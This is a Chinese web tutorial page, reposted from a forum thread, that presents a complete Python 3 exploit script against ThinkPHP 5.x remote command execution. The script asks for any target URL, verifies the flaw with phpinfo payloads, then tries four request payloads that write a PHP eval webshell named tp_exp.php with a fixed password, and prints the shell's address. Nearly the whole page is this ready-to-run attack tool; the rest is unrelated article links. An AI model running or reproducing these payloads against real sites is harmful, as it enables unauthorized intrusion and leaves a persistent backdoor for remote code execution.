python3编写ThinkPHP命令执行Getshell的方法
作者:nosafer 时间:2023-10-04 14:17:15
加了三个验证漏洞以及四个getshell方法
# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Morker
# @Email: [email]admin@nsf.me[/email]
# @Blog: [url]http://nsf.me/[/url]
import requests
import sys
def demo():
print(' _______ _ _ _ _____ _ _ _____ ')
print(' |__ __| | (_) | | | __ \| | | | __ \ ')
print(' | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
print(''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')
print(' | | | | | | | | | | <| | | | | | | ')
print(' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ')
print()
print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')
print('\tRemote command execution exploit.')
print('\tVulnerability verification and getshell.')
print('\tTarget: http://target/public')
print()
class ThinkPHP():
def __init__(self,web):
self.web = web
self.headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding" : "gzip, deflate",
"Content-Type" : "application/x-www-form-urlencoded",
"Connection" : "keep-alive"
}
def verification(self):
i = 0
s = 0
verifications = ['/?s=index/\\think\Request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
while True:
if i == len(verifications):
break
else:
url = self.web + verifications[i]
req = requests.get(url=url,headers=self.headers)
if 'phpinfo()' in req.text:
s = 1
break
else:
s = 0
i += 1
if s == 1:
print("[+] There are vulnerabilities.")
print()
toshell = input("[*] Getshell? (y/n):")
if toshell == 'y':
self.getshell()
elif toshell == 'n':
sys.exit()
else:
sys.exit()
else:
print("[-] There are no vulnerabilities.")
def getshell(self):
getshells = [
'?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',
'?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',
'?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',
'?s=index/\\think\\template\driver\\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']
shell = self.web + '/tp_exp.php'
i = 0
s = 0
while True:
if i == len(getshells):
break
else:
url = self.web + getshells[i]
req = requests.get(url=url,headers=self.headers)
req_shell = requests.get(url=shell,headers=self.headers)
if req_shell.status_code == 200:
s = 1
break
else:
s = 0
i += 1
if s == 1:
print("[+] WebShell :%s PassWord :nicai4" % shell)
else:
print("[-] The vulnerability does not exist or exists waf.")
def main():
demo()
url = input("[*] Please input your target: ")
run = ThinkPHP(url)
run.verification()
if __name__ == '__main__':
main()
注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。
环境地址:https://www.vsplate.com/
效果图:
来源:https://bbs.ichunqiu.com/thread-48729-1-1.html
标签:python3,ThinkPHP,Getshell
![](/images/zang.png)
![](/images/jiucuo.png)
猜你喜欢
解决Golang time.Parse和time.Format的时区问题
2024-05-22 17:46:06
oracle中的视图详解
2009-12-22 11:48:00
Python Queue模块详细介绍及实例
2022-03-08 11:03:58
为Python的Tornado框架配置使用Jinja2模板引擎的方法
2022-07-19 03:49:07
python中os.path.join()函数实例用法
2021-08-10 04:57:58
Python数学建模StatsModels统计回归模型数据的准备
2021-10-08 09:19:24
![](https://img.aspxhome.com/file/2023/1/79511_0s.png)
ASC码对照表
2008-08-07 13:07:00
Python结合ImageMagick实现多张图片合并为一个pdf文件的方法
2021-01-28 20:36:55
![](https://img.aspxhome.com/file/2023/4/70744_0s.jpg)
如何使用 Vuex的入门教程
2024-05-28 16:00:48
![](https://img.aspxhome.com/file/2023/3/123083_0s.jpg)
Scripting.Dictionary 对象
2007-10-13 09:46:00
MySQL中varchar和char类型的区别
2024-01-22 22:36:05
![](https://img.aspxhome.com/file/2023/3/129903_0s.png)
WPF框架Prism中ViewModelLocator用法介绍
2024-05-13 09:17:27
![](https://img.aspxhome.com/file/2023/6/126186_0s.jpg)
MySql批量插入优化Sql执行效率实例详解
2024-01-18 07:52:06
JetBrains(IEDA、CLion、Pycharm) 学生获得免费使用资格
2022-02-21 09:25:35
![](https://img.aspxhome.com/file/2023/7/132497_0s.png)
golang 用msgpack高效序列化的案例
2024-04-26 17:32:52
Python3爬虫RedisDump的安装步骤
2023-07-17 00:42:15
PHP date()格式MySQL中插入datetime方法
2024-05-13 09:51:39
SQL SERVER性能优化综述(很好的总结,不要错过哦)第1/3页
2024-01-14 13:43:58
mysql 5.7.11 winx64安装配置方法图文教程
2024-01-18 11:57:59
![](https://img.aspxhome.com/file/2023/1/108891_0s.png)
解决Python 中JSONDecodeError: Expecting value: line 1 column 1 (char 0)错误
2023-10-30 22:42:03
![](https://img.aspxhome.com/file/2023/6/71426_0s.png)